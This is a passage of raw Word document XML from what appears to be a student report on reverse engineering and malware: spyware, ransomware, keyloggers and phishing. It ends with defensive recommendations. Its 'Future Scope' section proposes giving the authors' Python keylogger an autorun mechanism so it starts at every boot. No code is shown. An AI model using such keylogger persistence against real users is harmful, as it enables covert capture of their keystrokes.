    <w:p w14:paraId="69F3C464"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 xml:space="preserve">Malware Analysis: Reverse engineering is crucial for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F922F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>analyzing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F922F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and understanding the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F922F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F922F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> of malware to develop effective detection and mitigation techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C22272" w14:textId="77777777" w:rsidR="00F922F6" w:rsidRPr="00F922F6" w:rsidRDefault="00F922F6" w:rsidP="00F922F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Intellectual Property Protection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB03B63"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Copyright Infringement: Reverse engineering helps in identifying instances of copyright infringement by examining and comparing the source code or design of products or software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE34C35"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Patent Disputes: Reverse engineering may be used to assess whether a product or technology infringes on existing patents, providing evidence in legal disputes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EF8836" w14:textId="77777777" w:rsidR="00F922F6" w:rsidRPr="00F922F6" w:rsidRDefault="00F922F6" w:rsidP="00F922F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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lastRenderedPageBreak/>
        <w:t>Hardware Analysis and Design:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E495C4F"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Interoperability and Compatibility: Reverse engineering enables the analysis and understanding of hardware interfaces and protocols to ensure compatibility and facilitate integration with other systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F66EA43"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Component Replacement: Reverse engineering assists in recreating or finding alternative components for legacy systems or devices that are no longer in production or supported.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A35E296"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Performance Optimization: By reverse engineering hardware designs, engineers can identify areas for optimization, such as improving efficiency, reducing power consumption, or enhancing functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20424A98" w14:textId="77777777" w:rsidR="00F922F6" w:rsidRPr="00F922F6" w:rsidRDefault="00F922F6" w:rsidP="00F922F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Product Design and Innovation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A34623E"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 xml:space="preserve">Competitive Analysis: Reverse engineering allows companies to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F922F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F922F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and understand competitor products, identify their strengths and weaknesses, and gain insights for product innovation and development.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A9A0C4"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Product Improvement: Reverse engineering helps in studying consumer products to understand their design and functionality, enabling manufacturers to make improvements or create compatible accessories or enhancements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24895A8B" w14:textId="77777777" w:rsidR="00F922F6" w:rsidRPr="00F922F6" w:rsidRDefault="00F922F6" w:rsidP="00F922F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Education and Research:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44634A15"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Learning and Education: Reverse engineering is employed as an educational tool to teach students about software and hardware systems, programming languages, and system analysis techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301DDB53" w14:textId="77777777" w:rsidR="00F922F6" w:rsidRPr="00F922F6" w:rsidRDefault="00F922F6" w:rsidP="00F922F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F922F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Cybersecurity Research: Reverse engineering aids in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F922F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>analyzing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F922F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and understanding security threats, vulnerabilities, and attack vectors, contributing to the development of stronger </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F922F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F922F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A20E9E" w14:textId="77777777" w:rsidR="0031366D" w:rsidRPr="002C7722" w:rsidRDefault="0031366D" w:rsidP="0031366D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58BDC070" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRPr="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="00E733A8">
      <w:p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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028C709E" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRPr="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="00E733A8">
      <w:p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In conclusion, the discussed topics of spyware, ransomware, Trojan keyloggers, and phishing emails highlight the pervasive nature of cyber threats and the need for robust cybersecurity measures. These malicious techniques pose significant risks to individuals, organizations, and society as a whole. However, understanding these techniques can help develop effective countermeasures and strategies to mitigate their impact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C90E66" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRPr="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="00E733A8">
      <w:p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Spyware, with its ability to track and monitor user activities surreptitiously, has both legitimate and malicious applications. While it can be used for employee monitoring or parental control, it can also invade privacy and compromise sensitive information. Proper safeguards, legal considerations, and responsible usage are essential to strike a balance between security and privacy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3A5752" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRPr="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="00E733A8">
      <w:p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 xml:space="preserve">Ransomware continues to be a lucrative tool for cybercriminals, targeting individuals, businesses, and even critical infrastructure. Its ability to encrypt files and extort ransom payments poses significant financial and reputational risks. Prevention through robust </w:t>
      </w:r>
      <w:r w:rsidRPr="00E733A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>security measures, regular backups, and employee awareness training is crucial in combating this evolving threat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05349D5D" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRPr="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="00E733A8">
      <w:p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Trojan keyloggers, although useful in certain scenarios such as digital forensics or security audits, raise ethical concerns due to their potential for unauthorized data capture. Strict adherence to legal frameworks and consent-based monitoring practices is vital to prevent misuse and maintain user trust.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E85B195" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRPr="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="00E733A8">
      <w:p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Phishing emails rely on social engineering tactics to deceive individuals into revealing sensitive information or downloading malware. Educating users about common phishing techniques, implementing email security measures, and promoting a security-aware culture can significantly reduce the success rate of phishing attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FA6ED4" w14:textId="10647F73" w:rsidR="00E733A8" w:rsidRPr="00E733A8" w:rsidRDefault="007D23B5" w:rsidP="00E733A8">
      <w:pPr>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8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007D23B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177AA2B8" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRPr="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="00E733A8">
      <w:p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Looking ahead, the fight against cyber threats demands continuous research, innovation, and collaboration across various domains. Here are some potential future areas of focus:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C12F4E" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRPr="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="00E733A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Advanced Detection and Mitigation Techniques:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C40A198" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRPr="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="00E733A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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Artificial Intelligence (AI) and Machine Learning (ML): Harnessing the power of AI and ML can enhance threat detection capabilities, enabling systems to identify and respond to evolving cyber threats in real-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66843163" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRPr="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="00E733A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E733A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Behavioral</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E733A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Analysis: Developing sophisticated algorithms to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E733A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E733A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E733A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E733A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>, network traffic, and system activities can help detect anomalies and potential security breaches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786795C0" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRPr="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="00E733A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Improved User Awareness and Education:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E8F171" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRPr="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="00E733A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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Cybersecurity Training: Investing in comprehensive cybersecurity training programs for individuals and organizations can empower users to recognize and respond effectively to emerging threats, such as social engineering attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B835E48" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRPr="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="00E733A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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Phishing Simulation: Conducting regular phishing simulation exercises can provide practical training for users to identify and avoid falling victim to phishing emails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C4CF04" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRPr="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="00E733A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Collaboration and Information Sharing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E46A4A4" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRPr="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="00E733A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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Public-Private Partnerships: Strengthening collaborations between government agencies, private sector organizations, and academia can facilitate the sharing of threat intelligence, best practices, and resources to collectively combat cyber threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27271FC4" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRPr="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="00E733A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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Information Sharing Platforms: Establishing secure platforms and frameworks for sharing anonymized threat data can enable timely identification and response to emerging cyber threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FA632B" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRPr="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="00E733A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Enhanced Legal Frameworks and Regulations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABB2E9A" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRPr="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="00E733A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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 xml:space="preserve">Strengthened Legislation: Governments and policymakers need to continually update and enhance cybersecurity laws and regulations to address emerging </w:t>
      </w:r>
      <w:r w:rsidRPr="00E733A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>threats, ensure privacy protection, and deter cybercriminal activities effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F7BCCF" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="00E733A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>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International Cooperation: Encouraging international cooperation and coordination in addressing cyber threats can foster a global response to cybercrime and improve the effectiveness of enforcement efforts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173B7E90" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRPr="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="00E733A8">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27C09A63" w14:textId="22EF9794" w:rsidR="007D23B5" w:rsidRDefault="00E733A8" w:rsidP="00E733A8">
      <w:p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In summary, while the discussed malware techniques pose significant risks, the proactive implementation of preventive measures, user education, and technological advancements can contribute to a safer digital landscape. The future lies in leveraging emerging technologies, fostering collaboration, and continuously adapting cybersecurity strategies to stay one step ahead of cyber threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38491737" w14:textId="77777777" w:rsidR="007D23B5" w:rsidRDefault="007D23B5" w:rsidP="00E733A8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="653021DA" w14:textId="6ED83602" w:rsidR="007D23B5" w:rsidRDefault="007D23B5" w:rsidP="00E733A8">
      <w:pPr>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 xml:space="preserve">9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
        <w:t>Future Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F67D93F" w14:textId="18527CA4" w:rsidR="00EA3DC9" w:rsidRDefault="007D23B5" w:rsidP="00E733A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rPr>
        <w:t xml:space="preserve">Improvements can definitely be made on the python keylogger, </w:t>
      </w:r>
      <w:r w:rsidR="00EA3DC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="00EA3DC9" w:rsidRPr="00EA3DC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ne area that stands out is implementing the autorun feature, as the default functionality provided by Windows does not always work reliably. By incorporating an autorun mechanism within the keylogger, the application can start automatically whenever the system boots up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245B78B9" w14:textId="3DEF920A" w:rsidR="00E733A8" w:rsidRDefault="00111982" w:rsidP="003136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rPr>
        <w:t xml:space="preserve">Reverse Engineering can be taken to the next level to build the entire application from the ground up, given the source material, </w:t>
      </w:r>
      <w:r w:rsidR="00EA3DC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">we weren’t able to replicate the application, but we did access to code files like the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EA3DC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>kotlin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EA3DC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EA3DC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>androidmanifest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EA3DC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> xml file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EB57E1" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="0031366D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="730FE693" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="0031366D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54BEB4AF" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="0031366D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="658F1160" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="0031366D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F850D3A" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="0031366D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CEBE8BA" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="0031366D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DEA1348" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="0031366D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B8F4F8D" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="0031366D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38D3F042" w14:textId="77777777" w:rsidR="00E733A8" w:rsidRDefault="00E733A8" w:rsidP="0031366D">
      <w:pPr>
        <w:rPr>
